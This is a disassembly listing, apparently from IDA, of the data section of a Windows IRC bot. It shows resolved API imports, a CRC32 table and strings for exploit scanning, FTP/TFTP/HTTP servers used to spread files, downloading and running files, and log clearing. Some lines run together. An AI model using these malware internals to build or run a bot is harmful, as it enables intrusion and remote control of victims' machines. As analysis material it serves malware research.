assume cs:_rdata
;org 41F000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_41F000 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401141+28B�r ...
dword_41F004 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_40169B+32�r ...
dword_41F008 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_401141+278�r ...
dword_41F00C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401141+25B�r ...
dword_41F010 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401141+183�r ...
dword_41F014 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_4018D1+24B�r ...
dword_41F018 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_4166C5+28�r ...
dword_41F01C dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_416673+28�r ...
dword_41F020 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_41F024 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_4018D1+23B�r ...
dword_41F028 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_41F02C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402795+D9�r ...
dword_41F030 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_401F06+485�r ...
dword_41F034 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402795+B2�r ...
dword_41F038 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_405915+AF�r ...
dword_41F03C dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_4037B8+26�r ...
dword_41F040 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_4078FA+3ECF�r ...
dword_41F044 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_41F048 dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTimedword_41F04C dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTimedword_41F050 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_4030C4+648�r
dword_41F054 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_41F058 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_40DC39+B9�r ...
dword_41F05C dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_419BC9+2D�r ...
dword_41F060 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_403B4C+1F6�r
dword_41F064 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; sub_40FE1F+185�r
dword_41F068 dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; sub_40FE1F+16E�r
dword_41F06C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_405915+10A�r ...
dword_41F070 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_40468E:loc_404B24�r ...
dword_41F074 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4143B9+15�r ...
dword_41F078 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_405915+F6�r ...
dword_41F07C dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_41F080 dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_41F084 dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_41F088 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_41F08C dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_41F090 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_41F094 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_41F098 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_41F09C dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_41F0A0 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_4070E8+293�r ...
dword_41F0A4 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_4078FA+2C1A�r
dword_41F0A8 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_414004:loc_414056�r ...
dword_41F0AC dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4182E4+22D�r ...
dword_41F0B0 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; .text:0040E564�r
dword_41F0B4 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_40DDC6+7D�r ...
dword_41F0B8 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_4078FA+357D�r ...
dword_41F0BC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_4070E8+24B�r ...
dword_41F0C0 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_41F0C4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_4074C6+10�r ...
dword_41F0C8 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_40F3F5+A3�r ...
dword_41F0CC dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_41F0D0 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_41C9A7+17�r
dword_41F0D4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_41F0D8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40D1EF+307�r
dword_41F0DC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_41F0E0 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_41F0E4 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipe ; sub_40DC39+101�r
dword_41F0E8 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandle ; sub_40F07B+6B�r
dword_41F0EC dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_40F2F9+48�r ...
dword_41F0F0 dd 7C81B58Bh ; resolved to->KERNEL32.SetConsoleCtrlHandlerdword_41F0F4 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_41CB47+23�r
dword_41F0F8 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40FE1F+20�r ...
dword_41F0FC dd 7C830B14h ; resolved to->KERNEL32.GetLogicalDrivesdword_41F100 dd 7C873A31h ; resolved to->KERNEL32.GenerateConsoleCtrlEventdword_41F104 dd 7C80A05Dh ; resolved to->KERNEL32.WaitForMultipleObjectsdword_41F108 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_41F10C dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_41F110 dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_41F114 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_41F118 dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_41F11C dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_41F120 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_41CDB8+6�r
dword_41F124 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_41F128 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_41F12C dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_41F130 dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_41B6EC:loc_41B742�r
dword_41F134 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_4169A5+2B4�r ...
dword_41F138 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_41318A+188�r ...
dword_41F13C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_4133A6+63�r ...
dword_41F140 dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTime ; sub_41C9A7+B�r
dword_41F144 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_41F148 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_41A5BE+5D�r
dword_41F14C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_41F150 dd 7C8136D7h ; resolved to->KERNEL32.TlsFreedword_41F154 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_41BBD8+79�r
dword_41F158 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_4154C7+55�r ...
dword_41F15C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_4154C7+3D�r
dword_41F160 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_41F164 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_41F168 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_41F16C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_41F170 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_41F174 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_416D74+52�r ...
dword_41F178 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_41F17C dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_4182E4+344�r ...
dword_41F180 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_4182E4+15B�r ...
dword_41F184 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_41F188 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_41F18C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_4192C7+3D�r ...
dword_41F190 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_41A5BE+188�r
dword_41F194 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_41F198 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_41F19C dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsAdword_41F1A0 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_41F1A4 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_41F1A8 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_41F1AC dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_41A5BE+196�r ...
dword_41F1B0 dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_41F1B4 dd 7C812D56h ; resolved to->KERNEL32.GetSystemInfodword_41F1B8 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuery ; sub_41AE30+71�r
dword_41F1BC dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeAdword_41F1C0 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_41AF01+128�r
align 8
dword_41F1C8 dd 80000015h dword_41F1CC dd 8000000Ah dword_41F1D0 dd 80000002h dword_41F1D4 dd 8000000Dh dword_41F1D8 dd 80000012h ; sub_402B1D+58B�r
dword_41F1DC dd 80000097h dword_41F1E0 dd 80000001h dword_41F1E4 dd 80000010h dword_41F1E8 dd 80000013h ; sub_402B1D+119�r
dword_41F1EC dd 80000073h ; sub_402B1D+49�r
dword_41F1F0 dd 80000017h ; sub_402B1D+6F�r
dword_41F1F4 dd 8000000Bh dword_41F1F8 dd 80000004h dword_41F1FC dd 80000003h ; sub_402A8B+80�r ...
dword_41F200 dd 80000074h ; sub_402A8B+86�r
dword_41F204 dd 80000009h ; sub_402B1D+B0�r
align 10h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_401000+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_401000+42�o
align 10h
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_401000+11�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_4010CA+42�o
align 4
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_4010CA+2C�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+38D�o
align 10h
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_401141+337�o
; sub_4078FA+3F73�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+27F�o
aFtpServerStart db '[FTP]: Server started on: %s:%d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+228�o
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+13B�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+DB�o
; sub_4078FA+3DE3�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_401525+42�o
; sub_406C33+3D�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_40169B+DC�o
align 4
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_40169B+84�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_4018D1+1E0�o
align 4
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_4018D1+16E�o
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_4018D1+10F�o
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_4018D1+A0�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_401BBB+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_401BBB+10�o
align 4
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_401C33+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_401CD3+1A�o
align 10h
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_401D45+DC�o
align 4
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_401D45+3F�o
align 4
dd 0
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_41F968 dd 6272h ; sub_410A22+121�o
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_401F06+4B6�o
align 4
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_401F06+4A8�o
align 4
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_401F06+403�o
aDownloadExecut db '[DOWNLOAD]: Execution failed: Error executing file: %s.',0
; DATA XREF: sub_401F06:loc_4022BC�o
aDownloadApplic db '[DOWNLOAD]: Application succesfully executed: %s.',0
; DATA XREF: sub_401F06+3AC�o
align 4
asc_41FA74: ; DATA XREF: sub_401F06+346�o
; sub_403E06+25C�o ...
unicode 0, < >,0
aDownloadOpenni db '[DOWNLOAD]: Openning: %s %s.',0 ; DATA XREF: sub_401F06+2B4�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_401F06+24E�o
align 10h
dbl_41FAD0 dq 9.765625e-4 ; DATA XREF: sub_401F06+21D�r
; sub_401F06:loc_402143�r ...
dbl_41FAD8 dq 4.294967296e9 ; DATA XREF: sub_401F06+215�r
; sub_401F06+237�r ...
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_401F06+195�o
align 10h
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_401F06:loc_402069�o
align 4
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_401F06+15C�o
align 10h
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_401F06+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_4024AC:loc_4024EF�o
; sub_4060D0+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_4024AC:loc_4024E9�o
aDisk db 'Disk',0 ; DATA XREF: sub_4024AC:loc_4024E3�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4024AC:loc_4024DD�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4024AC:loc_4024D7�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_4024AC:loc_4024D1�o
a?: ; DATA XREF: sub_4024AC+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_40253D:loc_402615�o
; sub_402658+2D�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_40253D+6C�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_402658+7B�o
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_402658+45�o
align 4
aA db 'A:\',0 ; DATA XREF: sub_402717+39�o
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_402B1D+542�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_402B1D+531�o
; sub_4078FA+5DD�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_402B1D+528�o
align 4
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_402B1D+4DC�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_402B1D+4C1�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_402B1D+491�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_402B1D:loc_402F97�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_402B1D+470�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_402B1D+45E�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_402B1D+42A�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_402B1D+3EC�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_402B1D:loc_402ED3�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_402B1D+38E�o
align 10h
aList db 'LIST',0 ; DATA XREF: sub_402B1D:loc_402E99�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_402B1D+350�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_402B1D:loc_402E5A�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_402B1D+333�o
aI: ; DATA XREF: sub_402B1D+31E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_402B1D+302�o
aA_0: ; DATA XREF: sub_402B1D+2ED�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_402B1D:loc_402DF6�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_402B1D+2CF�o
align 4
off_41FE14 dd offset dword_445750 ; DATA XREF: sub_402B1D+2BD�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_402B1D+2B1�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_402B1D:loc_402DBB�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_402B1D+294�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_402B1D:loc_402D9E�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_402B1D+277�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_402B1D:loc_402D81�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_402B1D+25A�o
align 4
aUser_0 db 'USER',0 ; DATA XREF: sub_402B1D+247�o
align 4
aSS_0 db '%s %s',0 ; DATA XREF: sub_402B1D+236�o
align 4
a220Winftpd1_2 db '220 WinFtpd 1.2',0Ah,0 ; DATA XREF: sub_402B1D+1BA�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4030C4+6BB�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4030C4+6A6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4030C4+68B�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4030C4+5F1�o
align 8
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4030C4+5C9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4030C4:loc_403645�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4030C4+57A�o
align 4
aSS db '%s%s',0 ; DATA XREF: sub_4030C4+523�o
; sub_403B4C+E6�o ...
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4030C4+4C5�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4030C4+484�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4030C4+451�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4030C4:loc_4034D7�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4030C4+40C�o
align 4
aSS_1 db '%s%s/',0 ; DATA XREF: sub_4030C4+3B5�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4030C4+36C�o
; sub_4030C4+4DA�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4030C4+33B�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4030C4+311�o
; sub_4030C4+463�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4030C4+2E5�o
aAm db 'AM',0 ; DATA XREF: sub_4030C4+2C4�o
; .data:0042D140�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_4030C4+2B9�o
; .data:0042D144�o
align 4
a__0: ; DATA XREF: sub_4030C4+27C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_4030C4+264�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4030C4+1F0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4030C4+15C�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4030C4+144�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4030C4+107�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4030C4+B4�o
